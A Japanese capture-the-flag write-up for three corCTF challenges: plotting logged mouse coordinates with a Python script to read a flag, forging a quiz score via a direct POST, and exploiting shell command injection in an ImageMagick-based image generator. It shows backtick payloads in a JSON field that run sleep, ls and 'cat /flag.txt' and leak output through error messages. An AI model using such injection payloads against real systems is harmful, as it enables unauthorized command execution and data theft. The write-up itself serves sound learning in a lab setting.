• [forensic] whack a frog
• [web] jsonquiz
• [web] msfrog generator

[forensic] whack a frog

ぱらぱら見ていくと GET /anticheat?x=18&y=11&event=mousemove というのが連なっている。
適当にダンプしてきて、GETリクエストの内容を見てみる。

GET /anticheat?x=365&y=10&event=mousemove
GET /anticheat?x=295&y=20&event=mousemove
GET /anticheat?x=204&y=31&event=mousemove
GET /anticheat?x=105&y=39&event=mousemove
GET /anticheat?x=82&y=39&event=mousemove
GET /anticheat?x=65&y=37&event=mousemove
GET /anticheat?x=54&y=34&event=mousemove
GET /anticheat?x=50&y=34&event=mousemove
...

座標に色を付けてみよう。

from PIL import Image, ImageDraw

img = Image.new("RGB", (600, 600), (0, 0, 0))

xs = [365,295,204,105,82,65,54,50,39,37,34,33,31,30,26,24,20,19,17,16,16,17,17,18,18,18,18,18,17,17,17,16,16,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,15,16,18,20,21,24,27,30,33,38,42,45,46,47,48,49,50,51,52,54,55,56,57,57,57,57,58,58,59,59,60,60,61,61,62,62,63,64,65,66,69,70,73,76,78,79,80,83,85,86,87,87,88,89,90,92,93,93,95,95,96,97,98,99,99,98,97,97,96,95,94,94,95,95,96,96,97,97,98,98,98,99,100,101,102,102,104,105,106,108,109,114,118,119,120,121,122,124,125,126,127,128,129,130,131,133,134,135,137,137,137,136,134,133,124,121,118,117,115,114,113,113,114,115,115,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,117,117,117,117,117,117,117,117,116,115,114,113,112,111,110,109,108,107,106,105,105,104,104,103,103,103,102,102,103,104,105,107,108,109,110,111,115,116,117,118,119,120,121,121,122,123,124,126,127,130,132,136,137,138,139,139,140,141,142,143,144,145,145,146,147,148,149,150,152,157,162,164,169,172,177,181,182,183,184,184,183,181,179,179,178,178,178,178,178,178,178,178,179,179,179,179,179,179,179,179,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,179,180,182,183,185,185,186,187,187,188,189,190,194,197,201,202,203,204,205,206,207,208,210,211,214,216,217,217,218,219,220,221,222,223,223,224,225,225,226,227,227,228,228,229,230,232,234,236,236,238,239,239,240,240,241,241,241,241,241,241,242,242,242,242,242,242,242,243,243,243,243,243,242,242,241,241,241,240,240,239,239,238,238,238,238,237,237,237,237,237,237,237,237,237,237,236,236,236,236,236,236,235,235,235,235,235,235,235,238,238,239,239,240,240,241,241,245,247,250,251,252,252,253,253,254,255,256,257,257,257,257,257,257,257,256,256,256,256,255,257,257,258,260,262,264,267,268,269,270,270,271,273,274,275,276,276,277,278,278,279,279,279,279,280,280,280,280,280,280,280,279,279,279,278,278,278,277,277,276,274,271,267,264,262,259,258,257,256,255,254,254,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,256,257,258,259,261,264,266,270,273,276,278,279,281,283,285,287,288,289,290,291,293,294,296,297,298,299,301,304,306,309,311,313,315,316,318,319,322,324,325,326,326,326,326,326,324,323,322,322,321,320,320,320,319,319,319,318,317,317,316,316,316,316,316,316,316,316,316,316,316,317,318,319,320,322,323,324,329,330,334,335,336,336,336,336,336,336,336,336,336,336,336,336,337,338,338,339,342,346,348,349,351,352,353,354,354,355,355,355,355,355,355,355,353,353,353,353,353,353,354,355,355,356,357,358,359,359,359,359,360,360,360,360,360,360,360,360,360,360,360,359,359,359,361,361,361,361,360,359,359,359,359,359,358,358,357,356,355,354,353,351,349,347,345,343,337,335,334,330,330,328,327,327,327,326,326,325,325,324,324,324,323,323,322,321,321,320,320,319,319,321,322,322,323,324,325,326,328,329,330,331,332,332,334,337,341,363,373,382,388,389,394,395,395,395,393,392,391,390,389,387,385,384,383,383,383,384,384,385,386,388,388,390,390,391,392,393,395,395,396,396,396,397,397,397,397,396,396,396,396,396,397,397,398,399,401,402,405,406,409,412,415,417,419,420,421,422,423,424,426,428,429,430,431,432,436,437,438,439,440,440,440,440,440,440,440,439,439,439,439,439,439,439,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,440,439,439,438,437,436,435,433,432,431,430,429,428,427,425,424,423,422,421,419,418,417,416,415,414,412,410,409,408,407,407,406,404,403,402,399,398,397,395,394,394,394,394,395,395,395,396,397,397,397,397,397,397,398,398,398,399,400,401,403,405,407,409,412,419,425,431,436,442,444,446,449,451,452,454,457,460,466,469,471,474,475,476,478,479,479,479,479,479,479,479,479,478,478,478,477,477,476,476,476,476,476,477,477,477,478,478,480,480,480,481,483,484,486,489,492,492,494,495,496,496,496,496,496,496,496,496,497,497,497,497,496,496,496,495,495,495,495,495,495,495,496,496,496,496,498,499,500,501,502,503,504,505,506,507,507,508,509,510,511,512,513,514,515,516,516,516,516,516,515,515,515,515,515,514,514,514,514,514,514,513,513,513,513,513,512,512,512,511,511,511,511,511,511,512,513,514,515,516,517,518,518,518,518,518,517,516,516,516,516,516,516,516,516,516,516,516,517,517,517,517,517,517,517,517,515,514,512,511,509,508,506,504,502,497,489,484,480,478,477,476,475,474,473,472,471,470,471,472,473,474,475,476,477,477,477,477,477,477,476,476,476,476,474,472,470,467,451,445,440,432,428,416,406,384,381,367,360,335,326,295,268,252,196,167,157,128,107,104,103,101,98,94,90,82,72,69,64,59,57,50,48,42,40,39,37,36,35,33,29,26,20,12,8,10,11,12,13,13,14,15,17,17,17,17,17,17,17,17,17,17,17,17,17,17,18,18,18,18,19,19,19,19,20,20,20,20,20,20,20,20,20,19,19,19,18,18,18,18,18,18,18,18,18,17,17,18,19,20,21,22,23,24,25,26,27,28,29,31,32,33,35,36,37,38,39,40,41,42,43,44,53,58,60,61,63,62,64,68,72,74,81,85,87,88,88,89,90,91,92,93,95,96,97,98,99,101,102,103,104,105,107,107,108,108,108,108,107,107,105,105,105,105,105,105,105,104,103,103,101,100,99,98,97,97,99,100,102,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,135,138,138,138,136,132,131,130,129,127,126,124,123,122,121,121,120,120,119,118,118,118,117,117,115,115,114,114,114,114,114,114,114,113,113,113,113,113,113,113,113,113,113,113,113,113,114,114,115,115,115,116,116,116,117,118,119,120,121,123,124,125,126,127,128,129,130,131,128,127,126,124,123,122,121,120,120,119,118,117,116,115,114,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,99,98,97,100,101,102,103,116,117,119,120,122,124,127,128,129,130,131,132,133,134,134,135,136,137,138,140,143,154,157,165,170,175,180,183,184,184,184,184,183,182,181,180,180,180,180,180,180,179,179,177,177,177,177,177,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,180,180,180,180,180,180,180,180,180,179,179,179,179,179,179,179,179,179,179,179,178,177,177,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,196,198,199,201,202,204,207,208,210,213,214,215,216,217,217,218,218,218,219,220,220,222,224,225,227,230,233,238,240,242,243,244,244,244,244,244,243,243,242,238,239,240,240,241,241,242,244,244,245,245,246,246,247,248,249,250,253,253,254,254,255,255,258,259,260,261,262,262,263,264,264,265,266,267,267,271,272,273,274,274,275,275,276,275,273,272,272,271,271,271,270,270,269,268,268,267,267,266,266,265,264,264,263,262,262,262,262,262,262,262,262,261,261,261,261,261,261,261,261,261,261,261,261,261,260,260,260,260,260,260,260,259,259,259,261,262,263,264,265,267,268,270,273,275,284,287,293,303,306,307,308,308,309,311,312,313,314,315,316,317,319,320,320,321,319,319,319,319,320,321,321,322,325,325,326,326,327,328,329,329,331,332,334,337,338,338,339,340,341,342,343,343,344,345,346,347,347,348,348,349,349,350,350,351,352,352,353,354,356,357,357,358,358,359,359,359,358,357,357,356,355,354,352,351,350,349,348,347,346,345,343,342,342,341,341,341,341,340,339,337,335,334,333,332,332,331,331,330,330,329,329,328,327,326,325,325,324,324,323,323,321,320,319,318,318,317,317,319,319,320,320,321,322,323,324,327,329,333,335,336,337,338,339,342,343,344,345,346,346,347,348,349,351,352,352,353,354,355,356,356,357,358,358,359,359,360,360,361,362,363,364,365,365,366,367,369,370,371,371,372,373,374,375,376,377,378,379,380,381,382,383,384,384,385,386,387,388,389,390,392,393,394,395,396,398,399,400,401,402,404,406,407,411,413,414,418,420,421,422,423,424,425,427,428,429,429,430,431,432,433,434,435,436,436,437,437,438,438,439,439,439,439,439,439,439,439,439,439,439,439,439,439,439,439,439,439,438,438,438,438,438,438,438,438,438,438,438,438,437,436,435,433,431,430,429,428,427,426,424,420,418,417,413,401,400,399,399,398,398,398,397,397,397,397,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,396,399,400,403,405,406,408,411,413,465,465,466,467,468,468,469,469,470,470,471,472,474,476,483,485,487,485,484,482,481,480,478,478,481,482,483,484,485,485,487,489,491,493,493,497,498,499,500,502,504,505,507,509,510,512,513,514,514,515,516,517,517,517,518,518,518,519,519,519,520,518,517,516,515,514,513,511,510,510,509,508,507,506,506,505,504,504,503,502,501,499,498,497,496,496,495,495,494,494,494,494,495,497,500,501,503,505,507,508,509,511,512,513,515,518,518,518,518,518,514,513,510,510,509,509,508,507,507,506,506,506,505,504,504,503,502,502,501,500,500,499,498,494,494,493,492,491,490,490,489,487,487,486,485,485,484,483,482,481,480,480,479,479,478,478,477,477,476,476,475,475,475,474,473,473,471,469,467,445,434,413,393]
ys = [10,20,31,39,39,37,34,34,30,29,26,25,22,21,20,19,18,16,15,14,13,13,12,12,11,10,9,8,8,9,10,12,16,17,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,41,42,45,47,48,49,50,51,53,54,56,57,58,59,60,61,62,64,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,64,63,63,62,61,60,60,59,58,57,56,55,54,52,51,49,45,44,40,37,35,34,33,29,28,26,25,23,21,20,18,17,16,15,14,13,11,10,9,9,8,8,8,9,9,9,9,10,10,9,12,15,16,18,18,20,21,21,21,21,21,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,19,19,19,19,19,23,25,27,28,30,32,32,33,33,32,31,30,29,28,28,31,32,33,34,35,36,37,39,41,42,44,45,46,47,47,48,49,50,51,52,53,54,54,55,55,55,55,55,55,55,55,55,56,56,57,57,58,59,60,61,62,63,63,63,63,63,63,63,63,63,62,62,62,62,62,62,62,63,63,63,63,63,63,64,64,64,64,65,65,65,65,65,64,64,63,63,62,62,61,60,60,59,58,55,53,52,49,48,43,39,38,35,33,31,30,28,26,25,23,21,20,19,17,15,14,13,12,11,10,9,9,13,14,15,16,18,22,24,25,26,27,28,29,30,31,32,33,34,35,39,40,42,45,46,48,50,51,52,54,55,56,57,58,59,59,59,59,59,59,60,60,60,61,61,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,61,60,60,59,59,58,58,58,57,57,57,56,56,55,54,54,52,51,50,49,47,46,45,44,43,43,42,41,40,39,38,37,36,35,33,32,31,30,29,28,27,26,25,24,23,22,21,20,20,19,19,18,18,17,16,15,15,14,14,16,17,18,19,20,21,19,18,17,16,15,14,13,12,11,10,9,9,13,14,19,20,21,22,23,24,25,26,30,31,33,34,35,34,34,33,33,32,32,32,32,33,34,35,36,37,37,38,39,40,41,39,39,38,35,34,32,30,29,28,27,26,24,23,22,21,21,20,19,18,17,16,15,14,13,13,12,11,11,14,15,16,17,18,19,19,20,20,20,21,23,25,27,32,35,38,41,43,44,46,47,48,49,49,49,50,51,52,53,54,55,56,57,58,59,60,61,62,62,62,62,61,60,59,58,57,56,55,54,54,53,52,52,51,50,50,50,50,49,48,48,47,46,46,45,44,44,43,41,40,39,38,37,36,35,34,32,30,29,28,27,26,25,23,21,21,20,19,19,18,17,17,16,15,14,13,12,12,11,10,10,13,14,15,16,18,19,19,20,21,22,23,24,26,27,32,34,37,39,39,40,38,37,36,35,34,33,33,41,42,43,44,45,45,46,47,50,52,53,55,56,58,59,60,60,59,58,57,56,55,55,61,62,63,63,60,54,51,48,45,42,40,35,33,30,28,26,24,23,22,20,19,17,16,15,13,12,11,10,9,8,9,10,11,12,14,16,17,18,19,19,19,20,21,23,23,24,26,27,29,31,32,34,39,41,42,46,45,48,49,50,51,52,53,54,54,54,55,56,56,57,58,59,60,61,62,62,62,61,61,60,60,59,59,58,57,57,56,55,54,53,52,50,49,46,44,39,35,33,31,30,29,28,26,26,26,26,26,26,26,26,26,25,24,24,23,23,22,22,21,21,20,20,19,18,18,17,17,16,15,15,14,13,12,12,11,10,9,9,16,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,18,18,18,18,18,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,36,37,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,58,59,59,59,60,60,61,61,61,61,61,61,62,62,62,63,63,63,63,63,63,64,64,64,64,64,64,64,64,65,65,65,65,65,65,65,65,65,65,64,63,62,62,61,60,58,56,53,52,51,50,49,48,47,47,47,46,45,45,44,43,43,41,39,38,38,37,36,36,36,35,35,34,34,33,33,32,30,30,28,27,26,24,23,22,21,20,19,18,17,16,16,15,14,13,12,12,11,11,13,14,15,16,17,18,19,22,23,23,24,26,27,29,31,33,34,34,35,35,35,36,37,38,39,40,42,42,43,44,45,43,41,41,39,38,37,36,34,33,33,33,34,44,44,45,46,46,47,48,48,49,50,51,52,53,53,54,55,55,56,56,57,57,57,58,56,55,54,54,54,55,56,58,60,61,62,63,64,65,65,64,63,63,62,61,58,57,54,52,51,49,46,44,41,39,35,34,31,30,28,26,23,22,21,20,20,19,18,17,16,15,14,13,12,11,11,12,13,15,16,17,18,18,19,21,22,22,23,24,26,27,28,30,33,38,41,45,46,47,49,51,52,53,55,56,58,58,58,58,58,58,58,58,57,56,56,59,60,60,61,62,62,62,62,61,60,58,58,58,58,58,58,57,56,55,53,52,48,46,42,40,39,36,34,33,32,31,32,32,32,31,29,27,26,25,25,24,23,23,21,21,19,19,19,18,18,18,18,16,15,13,11,14,14,14,14,14,13,13,13,12,14,16,17,18,19,21,22,23,24,25,26,27,28,31,32,33,34,34,35,36,37,37,38,39,40,41,42,43,44,45,45,46,47,48,49,50,51,52,53,54,55,56,59,61,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,64,64,64,64,64,64,64,64,65,65,64,63,63,62,62,62,62,61,61,60,60,59,59,58,58,58,58,58,58,57,57,57,56,56,56,55,55,54,53,51,50,49,48,47,45,44,42,34,33,31,28,24,23,21,21,19,18,18,17,17,17,17,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,19,19,19,19,19,19,19,19,19,20,20,21,21,21,21,22,22,22,22,23,23,22,22,21,20,21,22,23,25,26,34,36,37,38,39,40,41,42,43,43,44,45,46,47,48,49,50,51,52,53,54,56,57,58,59,60,61,63,64,64,64,64,64,64,64,64,65,65,65,65,65,65,65,65,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,66,66,66,66,66,66,66,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,67,67,66,66,64,63,58,56,53,51,48,44,40,37,35,34,32,29,27,27,27,26,25,24,23,22,21,20,17,16,16,18,19,27,28,29,30,31,32,33,35,36,37,38,39,40,41,42,43,44,45,45,46,47,48,49,50,51,52,53,53,54,55,56,57,58,60,61,62,63,63,63,63,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,65,65,65,65,65,65,65,65,65,65,64,63,62,62,61,58,56,55,53,51,47,44,42,40,37,35,34,32,31,29,24,22,22,18,20,21,22,23,24,25,27,28,28,29,30,31,32,32,33,34,35,36,36,37,37,38,39,38,38,37,36,36,35,34,33,32,32,31,29,26,25,25,24,23,23,22,22,24,27,28,29,29,30,31,31,32,33,34,35,35,36,36,37,38,38,39,39,39,40,41,42,43,44,45,46,46,47,48,49,50,51,52,53,54,55,56,57,58,58,59,60,61,62,63,64,64,64,63,60,58,57,56,55,54,53,51,49,47,42,41,38,34,33,32,31,30,30,28,27,26,25,24,23,23,21,21,20,20,18,17,19,20,22,23,24,25,28,29,30,31,31,33,34,35,36,37,39,41,41,42,43,43,44,45,45,46,46,47,48,48,49,49,50,50,51,51,52,53,54,55,55,56,58,58,59,60,61,62,63,64,63,63,62,62,61,61,59,59,58,57,57,56,55,54,52,51,50,48,47,46,45,44,42,42,44,45,45,46,47,47,48,48,49,49,50,50,52,54,55,56,57,58,58,59,62,63,64,65,66,66,67,66,65,65,64,63,62,61,60,58,56,53,51,50,49,48,47,43,42,41,40,39,38,36,36,35,33,32,31,30,30,29,28,27,25,24,23,21,20,18,17,17,17,17,17,17,18,18,18,18,18,18,19,19,19,19,19,19,19,19,19,19,19,19,19,19,18,18,18,18,18,17,17,17,16,16,16,17,18,18,18,18,18,18,18,17,17,17,17,17,16,16,16,15,15,15,15,15,15,14,14,14,14,14,14,14,15,16,17,19,21,22,23,24,32,33,34,36,37,38,39,41,42,43,45,46,47,48,49,50,51,52,53,54,55,56,57,58,60,61,62,63,63,63,63,63,63,63,63,63,63,63,63,64,64,64,64,65,65,64,63,62,61,60,60,59,58,57,55,54,53,52,50,49,48,47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,32,31,30,29,28,27,26,25,24,23,23,22,20,19,18,16,14,12,10,9,9,11,12,14,15,16,16,17,17,18,18,19,19,20,22,22,23,23,22,22,22,21,20,20,23,24,25,26,26,27,29,30,32,34,35,39,40,41,42,43,45,45,46,47,49,49,50,50,51,52,53,55,56,57,57,58,59,59,60,61,61,61,60,60,59,58,58,57,57,56,56,56,55,55,54,53,53,52,52,51,49,47,47,46,46,45,45,44,44,43,43,42,41,40,38,37,35,31,29,29,27,26,25,24,22,19,18,17,16,16,23,23,26,27,28,29,30,30,31,31,32,33,34,34,35,36,37,38,39,39,40,40,41,45,46,47,48,49,50,51,52,53,54,55,55,56,57,58,59,60,60,61,61,62,63,64,64,65,65,66,66,67,67,67,66,65,64,63,61,44,37,23,12]

draw = ImageDraw.Draw(img)

for x, y in zip(xs, ys):
    draw.point(((x, y)), fill=(255, 255, 0))

img.save("out.png", quality=95)

文字が浮かび上がってくるので、フォーマットを合わせて、フラグとする。

corctf{LILYXOX}

[web] jsonquiz

jsonの問題サイトが表示される。
真面目にやると大変そう。

プロキシログを見ていくと/assets/js/quiz.jsというのがある。
ここに

fetch("/submit", {
    method: "POST",
    headers: {
        "Content-Type": "application/x-www-form-urlencoded"
    },
    body: "score=" + score
}

というのがあり、/submitへ結果をPOSTするっぽい。

POST /submitでとりあえずscore=100のように送って100点を出してみるとフラグが得られた。

corctf{th3_linkedin_JSON_quiz_is_too_h4rd!!!}

[web] msfrog generator

あまり、攻撃できそうなポイントがない。
GET /のレスポンスを見ると<!-- NOTE: There is no (intended) vuln in the frontend, please don't waste your time digging into the JS ;) -->とあるので、おとなしくPOST /api/generateを見ていくことにする。

こんな感じで座標を文字列にしてエラーを出してみる。
[{"type":"msnose.png","pos":{"x":"bad","y":0}}]

Something went wrong :
b"convert-im6.q16: invalid argument for option `-geometry': +bad+0 @ error/convert.c/ConvertImageCommand/1672.\n"

ググってみるとimagemagickですね。
コマンドインジェクションかな？

[{"type":"msnose.png","pos":{"x":"`sleep 10`","y":0}}]

のようにすると10秒のwaitがかかったので動いていそう。
HTTPリクエスト経由で結果を得たいが、うまく刺さらないのでインターネットにはつながっていないのかも。

よくよく見るとエラーメッセージに入力が入ってきているのでこれを使えば情報が抜き出せそう。

"x"部分を

"x":"`ls -la | base64`"

のようにすればbase64エンコードされた結果が抜き出せたが、出力文字数には制限があるみたい。
でもフラグを得るには十分だった。

"x":"`ls / | base64`"

で/flag.txtがあるのがわかる。

"x":"`cat /flag.txt | base64`"

でフラグ獲得。

corctf{sh0uld_h4ve_r3nder3d_cl13nt_s1de_:msfrog:}